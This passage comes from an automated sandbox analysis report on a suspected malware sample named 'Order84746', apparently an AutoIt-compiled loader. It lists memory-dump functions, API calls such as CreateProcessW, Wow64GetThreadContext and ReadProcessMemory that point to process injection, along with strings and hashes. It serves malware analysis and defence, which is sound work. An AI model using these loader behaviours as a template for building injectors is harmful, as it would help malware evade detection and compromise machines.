                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Window$CreateShow
                          • String ID: AutoIt v3$edit
                          • API String ID: 1584632944-3779509399
                          • Opcode ID: f3c6edcc2883036dbc8fcd4c09365f43665bb1f349d1e118ec12cc96b45b9a8d
                          • Instruction ID: 947b661c8a1fdc5215538cd569020dca2d7b7e22ac25c0fae73a8929522cb151
                          • Opcode Fuzzy Hash: f3c6edcc2883036dbc8fcd4c09365f43665bb1f349d1e118ec12cc96b45b9a8d
                          • Instruction Fuzzy Hash: 78F0D0B1A592F07AD73157576C0CE673E7DDBC7F64F00401EFA08921A0C5610895EAF1

                          Control-flow Graph (rendered graph not reproduced; recovered block summary)
                          Entry block 11dafe8 (call 11d8c38, call 11daed8, CreateFileW); 11db13e VirtualAlloc; 11db15c ReadFile; 11db177 call 11daf18, call 11d9ed8; 11db1b3 call 11daf68; 11db1cd ExitProcess.
                          APIs
                            • Part of subcall function 011DAED8: Sleep.KERNELBASE(000001F4), ref: 011DAEE9
                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 011DB116
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1678053935.00000000011D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 011D8000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_11d8000_Order84746.jbxd
                          Similarity
                          • API ID: CreateFileSleep
                          • String ID: 1PNWTCCBAY8T35WHG
                          • API String ID: 2694422964-2517333615
                          • Opcode ID: ba388c8fcf4651ca6ef89b7b2e8379541b96320d13a3ba463b31311115bbdf78
                          • Instruction ID: d7122f979a1912325ef650f879f5735af6cc19ffbef1c81f1455da807f536a5f
                          • Opcode Fuzzy Hash: ba388c8fcf4651ca6ef89b7b2e8379541b96320d13a3ba463b31311115bbdf78
                          • Instruction Fuzzy Hash: 6051B430D08248DBEF15DBB8D854BEEBB74AF19304F004198E649BB2C0D7B90B45CBA5

                          Control-flow Graph (rendered graph not reproduced; recovered block summary)
                          Entry block 8e51af; 8e51cb call 8e6b0f; 953ca1 LoadStringW; 8e51e6 call 8e6a63; 953cbb call 8e510d, call 8e4db1; 953cd9 call 8e518c, call 8e4db1, call 8e518c; 8e5216 call 8e510d; 8e52a7 call 8e6eed; 8e5220 call 900d50, call 8e50e6, call 900d23, Shell_NotifyIconW, call 8ecb37.
                          APIs
                          • _memset.LIBCMT ref: 008E522F
                          • _wcscpy.LIBCMT ref: 008E5283
                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 008E5293
                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00953CB0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: IconLoadNotifyShell_String_memset_wcscpy
                          • String ID: Line:
                          • API String ID: 1053898822-1585850449
                          • Opcode ID: 88fb20e82964c95f2068e09b369293024f16785d82aa708bc1d15a379e7f2f1f
                          • Instruction ID: 361617a1d7a51f661c6a367259b83b643c704bcf80f5129b0c294aa704e778f3
                          • Opcode Fuzzy Hash: 88fb20e82964c95f2068e09b369293024f16785d82aa708bc1d15a379e7f2f1f
                          • Instruction Fuzzy Hash: 0431BC71508790AED320EB65DC42FDB77D8FF86358F00451EF699D2092EB70A6488B97
                          APIs
                          • _memset.LIBCMT ref: 00953725
                            • Part of subcall function 008E660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008E53B1,?,?,008E61FF,?,00000000,00000001,00000000), ref: 008E662F
                            • Part of subcall function 008E40A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008E40C6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: NamePath$FullLong_memset
                          • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$X$au3
                          • API String ID: 3051022977-1954568251
                          • Opcode ID: 0842516d41086dd401250cfb5f772334fdcad6557415f407beaf90ed5b6dbada
                          • Instruction ID: f001f19e4b427c765377c71558465f982cd02ec4c76ce9508c812f873ca0a104
                          • Opcode Fuzzy Hash: 0842516d41086dd401250cfb5f772334fdcad6557415f407beaf90ed5b6dbada
                          • Instruction Fuzzy Hash: 0B219671A10298AFCF11DF99C8457DE7BFCEF5A304F008059E405E7241DBB49A898F66
                          APIs
                            • Part of subcall function 008E41A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,008E39FE,?,00000001), ref: 008E41DB
                          • _free.LIBCMT ref: 009536B7
                          • _free.LIBCMT ref: 009536FE
                            • Part of subcall function 008EC833: __wsplitpath.LIBCMT ref: 008EC93E
                            • Part of subcall function 008EC833: _wcscpy.LIBCMT ref: 008EC953
                            • Part of subcall function 008EC833: _wcscat.LIBCMT ref: 008EC968
                            • Part of subcall function 008EC833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 008EC978
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                          • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                          • API String ID: 805182592-1757145024
                          • Opcode ID: fbd3f5b9f40d8cd4dd9576c6f6aa2192ed64ec5e55ddd1c89f2bf75fdaf1d503
                          • Instruction ID: 7574cd2012f8152ce6d0583350ae9d64b641624812f9d8345f969d8d13da020c
                          • Opcode Fuzzy Hash: fbd3f5b9f40d8cd4dd9576c6f6aa2192ed64ec5e55ddd1c89f2bf75fdaf1d503
                          • Instruction Fuzzy Hash: 7891A471910259AFCF04EFAACC929EDB7B4FF49350F108429F81AEB291DB749A05CB51
                          APIs
                            • Part of subcall function 008E5374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,009A1148,?,008E61FF,?,00000000,00000001,00000000), ref: 008E5392
                            • Part of subcall function 008E49FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 008E4A1D
                          • _wcscat.LIBCMT ref: 00952D80
                          • _wcscat.LIBCMT ref: 00952DB5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: _wcscat$FileModuleNameOpen
                          • String ID: \$\Include\
                          • API String ID: 3592542968-2640467822
                          • Opcode ID: 459db0d233ee36e4f7af3d3e10e142f02b5f2896733378a43fdde9b51e32a240
                          • Instruction ID: b583d294cb5389dcec91139113876141f72cccc66fbec997e2a7c3499f28be5c
                          • Opcode Fuzzy Hash: 459db0d233ee36e4f7af3d3e10e142f02b5f2896733378a43fdde9b51e32a240
                          • Instruction Fuzzy Hash: 8D51517641C3809FC714EF5ED9819AAB7F8FE9B300B50452EF649C32A1EB709508DB92
                          APIs
                          • __getstream.LIBCMT ref: 009034FE
                            • Part of subcall function 00907C0E: __getptd_noexit.LIBCMT ref: 00907C0E
                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 00903539
                          • __wopenfile.LIBCMT ref: 00903549
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                          • String ID: <G
                          • API String ID: 1820251861-2138716496
                          • Opcode ID: 41a20963b1677bbb1e0dd68ad68d600d16d5296166886ac446e14d0c0c897bc4
                          • Instruction ID: 3d30eff260b3b6b384b42824011934260de8fcdaae515659d6f75bc7f998945f
                          • Opcode Fuzzy Hash: 41a20963b1677bbb1e0dd68ad68d600d16d5296166886ac446e14d0c0c897bc4
                          • Instruction Fuzzy Hash: FC11E770E002169EDB51BFB58C4276E76ACAF85360B14CC25F819CB2D1EB34CA1197A1
                          APIs
                          • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,008FD28B,SwapMouseButtons,00000004,?), ref: 008FD2BC
                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,008FD28B,SwapMouseButtons,00000004,?,?,?,?,008FC865), ref: 008FD2DD
                          • RegCloseKey.KERNELBASE(00000000,?,?,008FD28B,SwapMouseButtons,00000004,?,?,?,?,008FC865), ref: 008FD2FF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CloseOpenQueryValue
                          • String ID: Control Panel\Mouse
                          • API String ID: 3677997916-824357125
                          • Opcode ID: ee16b165111a907705a689f5fcded998b560392ff71172db37b1ac8827c3dab2
                          • Instruction ID: 0765705631d623a59b6a26cac71b2fa720cf8e159e50cef493d2559491303dac
                          • Opcode Fuzzy Hash: ee16b165111a907705a689f5fcded998b560392ff71172db37b1ac8827c3dab2
                          • Instruction Fuzzy Hash: BA115775A1520CBFDB218FA8CC84EBE7BB9EF05744B004429EA01D7220E671AE40AB60
                          APIs
                          • CreateProcessW.KERNELBASE(?,00000000), ref: 011DA693
                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 011DA729
                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 011DA74B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1678053935.00000000011D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 011D8000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_11d8000_Order84746.jbxd
                          Similarity
                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                          • String ID:
                          • API String ID: 2438371351-0
                          • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                          • Instruction ID: 9a3cf4600a132f92f0035c71e3036b443c7ea5eb5fb839bf3746a4d721d5c91d
                          • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                          • Instruction Fuzzy Hash: 3C620F30A14658DBEB28CFA4D850BDEB771EF58300F1091A9D10DEB390E7759E81CB5A
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                          • String ID:
                          • API String ID: 3877424927-0
                          • Opcode ID: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
                          • Instruction ID: 61eff339972ba6ea1851ddd6bc429a1ce6648d33b62473e603b6c64a6eef49d9
                          • Opcode Fuzzy Hash: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
                          • Instruction Fuzzy Hash: 2851A2B1A00706EFDB288FA9C88566E77ADAF41320F24CB29F825962D0D7759F509B50
                          APIs
                            • Part of subcall function 008E4517: _fseek.LIBCMT ref: 008E452F
                            • Part of subcall function 0092C56D: _wcscmp.LIBCMT ref: 0092C65D
                            • Part of subcall function 0092C56D: _wcscmp.LIBCMT ref: 0092C670
                          • _free.LIBCMT ref: 0092C4DD
                          • _free.LIBCMT ref: 0092C4E4
                          • _free.LIBCMT ref: 0092C54F
                            • Part of subcall function 00901C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00907A85), ref: 00901CB1
                            • Part of subcall function 00901C9D: GetLastError.KERNEL32(00000000,?,00907A85), ref: 00901CC3
                          • _free.LIBCMT ref: 0092C557
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                          • String ID:
                          • API String ID: 1552873950-0
                          • Opcode ID: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                          • Instruction ID: 348b3c555af06f3b967ec6366d8e6970d745308ec8cca1eb617ac1dbb489238d
                          • Opcode Fuzzy Hash: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                          • Instruction Fuzzy Hash: 31516FB1904228AFDB149F68DC81BADBBB9FF48304F10049EF25DE7291DB715A808F59
                          APIs
                            • Part of subcall function 0090395C: __FF_MSGBANNER.LIBCMT ref: 00903973
                            • Part of subcall function 0090395C: __NMSG_WRITE.LIBCMT ref: 0090397A
                            • Part of subcall function 0090395C: RtlAllocateHeap.NTDLL(00FD0000,00000000,00000001), ref: 0090399F
                          • std::exception::exception.LIBCMT ref: 008FF51E
                          • __CxxThrowException@8.LIBCMT ref: 008FF533
                            • Part of subcall function 00906805: RaiseException.KERNEL32(?,?,0000000E,00996A30,?,?,?,008FF538,0000000E,00996A30,?,00000001), ref: 00906856
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                          • String ID: bad allocation
                          • API String ID: 3902256705-2104205924
                          • Opcode ID: e650e5adb5355cabef126d44c60451324af09a8d16001b131b166f53a920abdb
                          • Instruction ID: d11b0554e947f0cca38067139e5e16859313dad81289de4f56cb1be06528218e
                          • Opcode Fuzzy Hash: e650e5adb5355cabef126d44c60451324af09a8d16001b131b166f53a920abdb
                          • Instruction Fuzzy Hash: F7F0A43150421EABDB14BFACD801AEE77ECAF44358F64402AFB14D21C2DBB0964096A5
                          APIs
                          • GetTempPathW.KERNEL32(00000104,?), ref: 0092C72F
                          • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0092C746
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Temp$FileNamePath
                          • String ID: aut
                          • API String ID: 3285503233-3010740371
                          • Opcode ID: 3941b89575cfeefbd7a7c3cbda275d0e4b84e5483f1fad3c50fe7703954d33ae
                          • Instruction ID: fff21bc693aa4de9d2e4cb9d6d2ccf57dbcdeceaea31bca6b3ded69dfdff2fb4
                          • Opcode Fuzzy Hash: 3941b89575cfeefbd7a7c3cbda275d0e4b84e5483f1fad3c50fe7703954d33ae
                          • Instruction Fuzzy Hash: 15D05E71A0430EABDB10AB90DC0EF8A776C9B04708F0001A0B660E50B1DAF1E6998B54
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d899b761c16cb2a3bfa4843357416586389ca993feca1e733d6b874a7a16e76e
                          • Instruction ID: 71098bc7be6b83cc10f77edfed7889c43798bab27ddd7d4d1cd16ed5d6fe5433
                          • Opcode Fuzzy Hash: d899b761c16cb2a3bfa4843357416586389ca993feca1e733d6b874a7a16e76e
                          • Instruction Fuzzy Hash: ECF16971A083019FCB10DF28C595B6AB7E5FF89314F10892EF9999B292D774E905CF82
                          APIs
                          • _memset.LIBCMT ref: 008E5022
                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 008E50CB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: IconNotifyShell__memset
                          • String ID:
                          • API String ID: 928536360-0
                          • Opcode ID: 189ed7939c1b5631f6c7b863a85e3a1f36e86adc21c4d1a6b043f0df929ce94a
                          • Instruction ID: 3de318af8bd773402686f6d3b4991dcef6828b81ebd9e34fd656fa76f10802d7
                          • Opcode Fuzzy Hash: 189ed7939c1b5631f6c7b863a85e3a1f36e86adc21c4d1a6b043f0df929ce94a
                          • Instruction Fuzzy Hash: 7431A2B0608B51CFD721DF25D84569BBBE8FF4A309F00092EF69AC3251E771A944CB92
                          APIs
                          • __FF_MSGBANNER.LIBCMT ref: 00903973
                            • Part of subcall function 009081C2: __NMSG_WRITE.LIBCMT ref: 009081E9
                            • Part of subcall function 009081C2: __NMSG_WRITE.LIBCMT ref: 009081F3
                          • __NMSG_WRITE.LIBCMT ref: 0090397A
                            • Part of subcall function 0090821F: GetModuleFileNameW.KERNEL32(00000000,009A0312,00000104,00000000,00000001,00000000), ref: 009082B1
                            • Part of subcall function 0090821F: ___crtMessageBoxW.LIBCMT ref: 0090835F
                            • Part of subcall function 00901145: ___crtCorExitProcess.LIBCMT ref: 0090114B
                            • Part of subcall function 00901145: ExitProcess.KERNEL32 ref: 00901154
                            • Part of subcall function 00907C0E: __getptd_noexit.LIBCMT ref: 00907C0E
                          • RtlAllocateHeap.NTDLL(00FD0000,00000000,00000001), ref: 0090399F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                          • String ID:
                          • API String ID: 1372826849-0
                          • Opcode ID: e0c8e15e11659e3ee38faed28ee819a13dca6fa00734813d730fae5b4847122c
                          • Instruction ID: d08a512e7e3e9ede28a319d9f7f298552274c54d119ab229db21d3ac6e32f1a0
                          • Opcode Fuzzy Hash: e0c8e15e11659e3ee38faed28ee819a13dca6fa00734813d730fae5b4847122c
                          • Instruction Fuzzy Hash: 3901F531359211DEE6213B78EC42B2A738C9FC2760F21842AF5619B2D2DFF49D0086A0
                          APIs
                          • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0092C385,?,?,?,?,?,00000004), ref: 0092C6F2
                          • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0092C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0092C708
                          • CloseHandle.KERNEL32(00000000,?,0092C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0092C70F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
